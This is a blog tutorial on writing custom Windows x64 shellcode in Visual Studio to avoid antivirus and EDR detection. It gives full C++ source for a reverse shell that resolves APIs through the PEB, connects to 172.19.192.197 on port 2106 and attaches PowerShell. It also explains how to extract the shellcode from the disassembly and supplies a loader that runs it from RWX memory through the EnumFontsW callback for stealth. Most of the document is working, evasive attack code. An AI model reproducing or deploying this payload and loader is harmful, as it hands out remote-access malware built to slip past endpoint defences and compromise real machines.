How To Craft Your Own Windows x86/64 Shellcode with Visual Studio

Demonstrating how you could craft & launch a customized shellcode to target Windows x86/64 artefacts.

Posted by Yazid on July 23, 2023

\x62\x6F\x75\x68\x21

Many antivirus and EDR products now ship signatures and heuristics for shellcode generated by well-known tools such as msfvenom (Metasploit's payload generator) or Sliver (C2). These tools are very powerful, but their notoriety works against them and can turn a red teaming operation into a real nightmare when protections have to be bypassed. You can obfuscate or encrypt a shellcode in the loader, load it block by block, or use other tricks, but with some C++ skills it is far more useful to know how to craft your own shellcode: you can customize it to your needs and implement whatever capabilities you require.

We're going to create a malicious payload, such as a reverse shell, which we'll then convert into x64 shellcode. The payload/shellcode we'll be designing here is stageless because it is, after all, only a proof of concept, but you could easily improve it & implement a staged payload using methods such as reflective DLL loading.
We're also going to design a payload that's independent of any pre-imports, and which itself retrieves the functions it needs and loads the necessary DLLs.

As a bonus, we'll see how to execute the shellcode from functions that at first glance seem totally legitimate, such as EnumFontsW, whose original purpose is to enumerate Windows fonts 🙉.



Starting from the PEB

The PEB (Process Environment Block) is a user-mode structure that holds information about the process it belongs to. The kernel's EPROCESS structure keeps a pointer to it. Most of what EPROCESS references can only be accessed in kernel mode, but the PEB itself lives in the process's user-mode address space and can be read from user mode.

The program we're about to design will contain only one thread: the main thread, which has its own TEB (Thread Environment Block), also known as the TIB (Thread Information Block). While a thread runs, a segment register (FS or GS) points at its TEB, so offsets from that segment can be used to read TEB fields, including the pointer to the PEB.
Note that the FS segment is used by 32-bit processes, and the GS segment by 64-bit processes.

Here is a list of all TIB/TEB internal structures, data and their associated FS/GS offsets. We need to locate the PEB as it is the starting point of our malicious payload, and we'll need it later to retrieve everything the payload will need.
As you can see, the PEB pointer sits at offset 0x60 from GS on x64 (0x30 from FS on x86): that slot holds the linear address of the PEB.

We'll use the intrinsic function __readgsqword to read the 8-byte value stored at that offset in the GS segment.
We then cast that value to PPEB, a pointer to the PEB structure.


PPEB peb = (PPEB)__readgsqword(0x60);                                
                                

Retrieving the Loader Data Table (LDR) content

We will then retrieve from the PEB a pointer to the PEB_LDR_DATA structure.

typedef struct _PEB_LDR_DATA
{
     ULONG Length;
     UCHAR Initialized; 
     PVOID SsHandle;
     LIST_ENTRY InLoadOrderModuleList;
     LIST_ENTRY InMemoryOrderModuleList;
     LIST_ENTRY InInitializationOrderModuleList;
     PVOID EntryInProgress;
} PEB_LDR_DATA, *PPEB_LDR_DATA;


typedef struct _LIST_ENTRY
{
     PLIST_ENTRY Flink;
     PLIST_ENTRY Blink;
} LIST_ENTRY, *PLIST_ENTRY;

This structure contains three LIST_ENTRY structures. We're interested in InMemoryOrderModuleList, which is the head of a circular doubly-linked list where each element represents a module loaded by the process, in memory order. On a typical process the first element is the process image itself, the second is NTDLL, and the third is KERNEL32. Our payload only needs these last two modules to do the rest, i.e. loading the libraries it requires, such as WS2_32.dll or User32.dll, and dynamically resolving the functions it needs.

We can retrieve and print the content of InMemoryOrderModuleList by traversing the linked list and stopping once we are back at the list head:

PPEB_LDR_DATA peb_ldr_data = (PPEB_LDR_DATA)peb->Ldr;

PLIST_ENTRY first_list_entry = (PLIST_ENTRY)&(peb_ldr_data->InMemoryOrderModuleList);
	
PLIST_ENTRY list_entry = first_list_entry->Flink;

while (list_entry->Flink != first_list_entry->Flink) {
	PLDR_DATA_TABLE_ENTRY pldr_data_table_entry = (PLDR_DATA_TABLE_ENTRY)list_entry;
	wcout << pldr_data_table_entry->FullDllName.Buffer << endl;
	list_entry = list_entry->Flink;
} 
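Which gives us the following output, representing the loaded modules in memory order. Only base names appear because list_entry is cast directly instead of going through CONTAINING_RECORD, so the FullDllName access is shifted by the offset of InMemoryOrderLinks and actually reads BaseDllName: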
 
ownshellcoding.exe
ntdll.dll
KERNEL32.DLL
KERNELBASE.dll
ucrtbase.dll
MSVCP140.dll
VCRUNTIME140.dll
VCRUNTIME140_1.dll
                            

Why are we doing this? Because we first want to resolve the two essential functions through which we can do everything else. These two functions are GetProcAddress, which retrieves the address of an exported procedure from a module, and LoadLibraryA, which loads a module into the process's memory. Both are exported by Kernel32.dll, and yes, believe me, we can build our malicious payload using only these two functions.

This is where the LDR structure comes into play. It will allow us to find the address of Kernel32.dll and exploit its internal structures as a PE (Portable Executable) format object.

Parsing the Kernel32 PE object

In the first step, we retrieve a pointer to the LDR_DATA_TABLE_ENTRY structure of Kernel32.dll, which is the third module in the in-memory order list, as shown above. Then, we declare a pointer to an IMAGE_DOS_HEADER structure so that we can subsequently parse the elements of the Kernel32 PE object.


PLDR_DATA_TABLE_ENTRY kernel32Entry = CONTAINING_RECORD(peb->Ldr->InMemoryOrderModuleList.Flink->Flink->Flink, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);

PIMAGE_DOS_HEADER kernel32DosHeader = (PIMAGE_DOS_HEADER)kernel32Entry->DllBase;
PIMAGE_NT_HEADERS64 kernel32NtHeader = (PIMAGE_NT_HEADERS64)((BYTE*)kernel32DosHeader + kernel32DosHeader->e_lfanew);
PIMAGE_EXPORT_DIRECTORY kernel32ExportsTable = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)kernel32DosHeader + kernel32NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

DWORD* kernel32addressOfFunctions = (DWORD*)((BYTE*)kernel32DosHeader + kernel32ExportsTable->AddressOfFunctions);
DWORD* kernel32addressOfNames = (DWORD*)((BYTE*)kernel32DosHeader + kernel32ExportsTable->AddressOfNames);
WORD* kernel32addressOfNameOrdinals = (WORD*)((BYTE*)kernel32DosHeader + kernel32ExportsTable->AddressOfNameOrdinals);
    

We won't go into the details of the internal structures of a PE format object (assuming you have a basic understanding of its components). After obtaining the LDR_DATA_TABLE_ENTRY and IMAGE_DOS_HEADER pointers, we will navigate through the exports table of Kernel32.dll to find our first crucial function: GetProcAddress, which will then serve to locate LoadLibraryA.

However, let's not forget that in the end, we want to convert our program into shellcode and have certain data, such as the character string that will be used to locate and access the functions later, contained within the same binary code that we will generate. This implies that these data should not end up in another section of the executable, as it would prevent us from accessing them if we were to export our shellcode to another process. Declaring a char* to hold our data would result in such a situation. Remember, everything must remain localized within our .text section.
A simple way to overcome this issue is to declare uint64_t data types or structures of uint64_t that will contain our character strings in their hexadecimal form, with the only small constraint being that we need to do this in little-endian format!


//47 65 74 50 72 6F 63 41 -> GetProcA (first 8 bytes)
uint64_t GetProcA = 0x41636F7250746547;

struct {
    uint64_t t0, t1;
} text;
				
// user32.dll
// 75 73 65 72 33 32 2E 64 -> user32.d 
// 6C 6C -> ll
text.t0 = 0x642E323372657375; // first 8 bytes
text.t1 = 0x0000000000006C6C; // last 2 bytes

So, we can now step up our game and fetch the address of GetProcAddress, but first, we need to define its signature according to how it has been defined in the Windows API:


/*
FARPROC GetProcAddress(
    [in] HMODULE hModule,
    [in] LPCSTR  lpProcName
    );
*/

typedef FARPROC (*_GetProcAddress)(HMODULE, LPCSTR);

_GetProcAddress GetProcAddress = nullptr;

Let's go! Next, we will search the exports table of Kernel32.dll for a function whose name starts with "GetProcA" and link it dynamically.


for (DWORD i = 0; i < kernel32ExportsTable->NumberOfNames; i++) {

    DWORD functionRVA = kernel32addressOfFunctions[i];
    const char* functionName = (const char*)((BYTE*)kernel32DosHeader + functionRVA);
    const char* exportedName = (const char*)((BYTE*)kernel32DosHeader + kernel32addressOfNames[i]);
    
    if (*(uint64_t *)((size_t)kernel32DosHeader + kernel32addressOfNames[i]) == GetProcA) {        
        
        GetProcAddress = (_GetProcAddress)(const void*)((size_t)kernel32DosHeader + kernel32addressOfFunctions[kernel32addressOfNameOrdinals[i]]);

Now that we have the GetProcAddress function at hand, we can use it to locate the rest of the addresses we need, including LoadLibraryA. LoadLibraryA will be used to load the necessary libraries for our reverse shell, namely User32.dll and Ws2_32.dll.

Here is the full source code of the malicious payload, which establishes a reverse shell to 172.19.192.197 on TCP port 2106 and attaches a PowerShell process to it:

    
#include <WinSock2.h>
#include <windows.h>
#include <winternl.h>
#include <cstdint>

__declspec(noinline) void customshellcode() {

    WSAData wsadata;
    struct sockaddr_in sock_addr;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    HMODULE ntdll;
    HMODULE user32;
    HMODULE ws2_32;
    HMODULE kernel32;

    PPEB peb = (PPEB)__readgsqword(0x60); // gs 0x60 & fs 0x30

    PPEB_LDR_DATA peb_ldr_data = (PPEB_LDR_DATA)peb->Ldr;

    PLDR_DATA_TABLE_ENTRY ntdllEntry = CONTAINING_RECORD(peb->Ldr->InMemoryOrderModuleList.Flink->Flink, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);

    PIMAGE_DOS_HEADER ntdllDosHeader = (PIMAGE_DOS_HEADER)ntdllEntry->DllBase;
    ntdll = (HMODULE)ntdllDosHeader;

    PLDR_DATA_TABLE_ENTRY kernel32Entry = CONTAINING_RECORD(peb->Ldr->InMemoryOrderModuleList.Flink->Flink->Flink, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);

    PIMAGE_DOS_HEADER kernel32DosHeader = (PIMAGE_DOS_HEADER)kernel32Entry->DllBase;
    PIMAGE_NT_HEADERS64 kernel32NtHeader = (PIMAGE_NT_HEADERS64)((BYTE*)kernel32DosHeader + kernel32DosHeader->e_lfanew);
    PIMAGE_EXPORT_DIRECTORY kernel32ExportsTable = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)kernel32DosHeader + kernel32NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

    DWORD* kernel32addressOfFunctions = (DWORD*)((BYTE*)kernel32DosHeader + kernel32ExportsTable->AddressOfFunctions);
    DWORD* kernel32addressOfNames = (DWORD*)((BYTE*)kernel32DosHeader + kernel32ExportsTable->AddressOfNames);
    WORD* kernel32addressOfNameOrdinals = (WORD*)((BYTE*)kernel32DosHeader + kernel32ExportsTable->AddressOfNameOrdinals);

    struct {
        uint64_t t0, t1;
    } text;

    // Ntdll
    typedef void (*_memset)(void*, int, size_t);

    // User32
    typedef int (*_MessageBox)(HWND, LPCTSTR, LPCTSTR, UINT);

    // Winsock
    typedef int (*_WSAStartup)(WORD, LPWSADATA);
    typedef SOCKET(*_WSASocketA)(int, int, int, LPWSAPROTOCOL_INFOA, GROUP, DWORD);
    typedef int (*_WSAConnect)(SOCKET, const sockaddr*, int, LPWSABUF, LPWSABUF, LPQOS, LPQOS);
    typedef int (*_send)(SOCKET, const char, int, int);
    typedef int (*_recv)(SOCKET, char, int, int);
    typedef u_short(*_htons)(u_short);
    typedef unsigned long(*_inet_addr)(const char*);

    // Kernel32
    typedef FARPROC(*_GetProcAddress)(HMODULE, LPCSTR);
    typedef HMODULE(*_LoadLibraryA)(LPCSTR);
    typedef BOOL(*_CreateProcessA)(LPCSTR, LPCSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION);

    _GetProcAddress GetProcAddress = nullptr;
    _LoadLibraryA LoadLibraryA = nullptr;
    _MessageBox MessageBox = nullptr;
    _WSAStartup WSAStartup = nullptr;
    _WSASocketA WSASocketA = nullptr;
    _WSAConnect WSAConnect = nullptr;
    _send send = nullptr;
    _recv recv = nullptr;
    _memset memset = nullptr;
    _htons htons = nullptr;
    _inet_addr inet_addr = nullptr;
    _CreateProcessA CreateProcessA = nullptr;

    for (DWORD i = 0; i < kernel32ExportsTable->NumberOfNames; i++) {

        DWORD functionRVA = kernel32addressOfFunctions[i];
        const char* functionName = (const char*)((BYTE*)kernel32DosHeader + functionRVA);
        const char* exportedName = (const char*)((BYTE*)kernel32DosHeader + kernel32addressOfNames[i]);

        // GetProcAddress
        // 47 65 74 50 72 6F 63 41
        // 64 64 72 65 73 73
        uint64_t GetProcA = 0x41636F7250746547;
        if (*(uint64_t*)((size_t)kernel32DosHeader + kernel32addressOfNames[i]) == GetProcA) {

            GetProcAddress = (_GetProcAddress)(const void*)((size_t)kernel32DosHeader + kernel32addressOfFunctions[kernel32addressOfNameOrdinals[i]]);

            // LoadLibraryA
            // 4C 6F 61 64 4C 69 62 72
            // 61 72 79 41
            text.t0 = 0x7262694C64616F4C;
            text.t1 = 0x0000000041797261;

            kernel32 = (HMODULE)kernel32DosHeader;
            LoadLibraryA = (_LoadLibraryA)GetProcAddress(kernel32, (LPSTR)&text.t0);

            // User32.dll
            // 75 73 65 72 33 32 2E 64 
            // 6C 6C
            text.t0 = 0x642E323372657375;
            text.t1 = 0x0000000000006C6C;
            user32 = LoadLibraryA((const char*)&text.t0);

            // MessageBoxA
            // 4D 65 73 73 61 67 65 42 
            // 6F 78 41
            text.t0 = 0x426567617373654D;
            text.t1 = 0x000000000041786F;
            MessageBox = (_MessageBox)GetProcAddress(user32, (LPSTR)&text.t0);

            // Ws2_32.dll
            // 57 73 32 5F 33 32 2E 64
            // 6C 6C
            text.t0 = 0x642E32335F327357;
            text.t1 = 0x0000000000006C6C;
            ws2_32 = LoadLibraryA((const char*)&text.t0);

            // WSAStartup
            // 57 53 41 53 74 61 72 74 
            // 75 70
            text.t0 = 0x7472617453415357;
            text.t1 = 0x0000000000007075;
            WSAStartup = (_WSAStartup)GetProcAddress((HMODULE)ws2_32, (const char*)&text.t0);

            // WSASocketA
            // 57 53 41 53 6F 63 6B 65 
            // 74 41
            text.t0 = 0x656B636F53415357;
            text.t1 = 0x0000000000004174;
            WSASocketA = (_WSASocketA)GetProcAddress((HMODULE)ws2_32, (const char*)&text.t0);

            // WSAConnect
            // 57 53 41 43 6F 6E 6E 65 
            // 63 74
            text.t0 = 0x656E6E6F43415357;
            text.t1 = 0x0000000000007463;
            WSAConnect = (_WSAConnect)GetProcAddress((HMODULE)ws2_32, (const char*)&text.t0);

            // memset 
            // 6D 65 6D 73 65 74
            text.t0 = 0x00007465736D656D;
            text.t1 = 0x0000000000000000;
            memset = (_memset)GetProcAddress((HMODULE)ntdll, (const char*)&text.t0);

            // send
            // 73 65 6E 64
            text.t0 = 0x00000000646E6573;
            send = (_send)GetProcAddress((HMODULE)ws2_32, (const char*)&text.t0);

            // recv
            // 72 65 63 76
            text.t0 = 0x0000000076636572;
            recv = (_recv)GetProcAddress((HMODULE)ws2_32, (const char*)&text.t0);

            // htons
            // 68 74 6F 6E 73
            text.t0 = 0x000000736E6F7468;
            htons = (_htons)GetProcAddress((HMODULE)ws2_32, (const char*)&text.t0);

            // inet_addr
            // 69 6E 65 74 5F 61 64 64 
            // 72
            text.t0 = 0x6464615F74656E69;
            text.t1 = 0x0000000000000072;
            inet_addr = (_inet_addr)GetProcAddress((HMODULE)ws2_32, (const char*)&text.t0);

            // CreateProcessA
            // 43 72 65 61 74 65 50 72 
            // 6F 63 65 73 73 41
            text.t0 = 0x7250657461657243;
            text.t1 = 0x000041737365636F;
            CreateProcessA = (_CreateProcessA)GetProcAddress((HMODULE)kernel32, (const char*)&text.t0);

            break;
        }
    }

    // Reverse shell inspired by https://cocomelonc.github.io/tutorial/2021/09/15/simple-rev-c-1.html by @cocomelonc

    int init = WSAStartup(MAKEWORD(2, 2), &wsadata);
    SOCKET sock = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

    // 2106
    // 08 3A
    text.t0 = 0x83A;
    text.t1 = 0x0000000000000000;

    short port = static_cast(text.t0);
    sock_addr.sin_family = AF_INET;
    sock_addr.sin_port = htons(port);

    // 172.19.192.197
    // 31 37 32 2E 31 39 2E 31 
    // 39 32 2E 31 39 37
    text.t0 = 0x312E39312E323731;
    text.t1 = 0x00003739312E3239;

    sock_addr.sin_addr.s_addr = inet_addr((const char*)&text.t0);

    int conn = WSAConnect(sock, (SOCKADDR*)&sock_addr, sizeof(sock_addr), NULL, NULL, NULL, NULL);
    memset(&si, 0, sizeof(si));

    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES;
    si.hStdInput = si.hStdOutput = si.hStdInput = si.hStdOutput = (HANDLE)sock;

    // powershell.exe
    // 70 6F 77 65 72 73 68 65  
    // 6C 6C 2E 65 78 65
    text.t0 = 0x6568737265776F70;
    text.t1 = 0x00006578652E6C6C;

    CreateProcessA(NULL, (const char*)&text.t0, NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA)&si, &pi);
}

int main() {

    customshellcode();
    return 0;
}
    

We can confirm that we have successfully opened a reverse shell to the remote machine. Now, it's time to turn all of this into shellcode!

Payload conversion to shellcode

First, make sure that we are in Release mode and choose the build target (x64 or x86; the payload above is written for x64).

Do not build in Debug mode, as Visual Studio may add symbols and extra instrumentation that would break the uniformity of the assembly code and its independence.

Next, ensure that you disable the /GS option in the compilation settings. This option adds security cookies to the binary code, which could also affect the independence of the shellcode.

Then, set a breakpoint on the function that contains your payload. In my case, it is named customshellcode().

Then launch the program with the Visual Studio local debugger. The program execution will stop at the breakpoint you have set. Now, press Ctrl+Alt+D to open the disassembly view of your code.

To facilitate what we will do next, make sure to select the display of code bytes.

Afterward, copy the assembly code from your function to a text editor and apply a set of regular expressions to format the shellcode. The search-and-replace steps are as follows:

// 1. Replace with nothing: this removes the mnemonic and the operands following it
Regex: \b(?:mov|movsxd|ret|cmp|lea|call|inc|jmp|movzx|push|nop|ret|xor|sub|pop|jb|add|je|test)\b.*$ 

// 2. Remove all the spaces by simply searching for a space character and replacing it with nothing.

// 3. Shellcode wrapping by searching for (.{30}) and replacing it with $1\n

// 4. Shellcode formatting by adding the '\x's & quotes, done by searching for (.{2}) and replacing with \x$1, then searching for (^|$) and replacing it with "

Here's the result:

Magnificent! Now that we have our shellcode, we can copy it into a program that will be responsible for executing it. To do this, we will launch our shellcode from a routine that was never intended for this purpose: EnumFontsW.

Using the EnumFontsW routine to launch our shellcode adds an element of stealth to our execution process. EnumFontsW is a legitimate function for enumerating the available fonts, and it calls an application-supplied callback for each font it finds, so passing the shellcode address as that callback gets it executed. Because the call looks ordinary, it may raise less suspicion from antivirus or Endpoint Detection and Response (EDR) systems. Abusing callback-taking API functions this way is a well-known shellcode execution technique.

Here is the complete program used to launch the shellcode:


#include <iostream>
#include <stdint.h>

#define WIN32_LEAN_AND_MEAN
#include <windows.h>

#pragma warning (push, 0)
#include <winternl.h>
#include <cstdint>

// Paste your shellcode there
unsigned char sc[] =
"\x48\x89\x5C\x24\x20\x55\x56\x57\...."; 

int main() {        
    LPVOID scBaseAddr = VirtualAlloc(NULL, sizeof(sc), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(scBaseAddr, sc, sizeof(sc));

    HDC dc = GetDC(NULL);
    EnumFontsW(dc, NULL, (FONTENUMPROCW)scBaseAddr, NULL);

    return 0;
}

Boouum! Shellcode executed successfully!! 😺🏴‍☠️

I'm still learning, so if you have a comment or observation on this article, feel free to contact me. My email addresses are on my GitHub profile 😸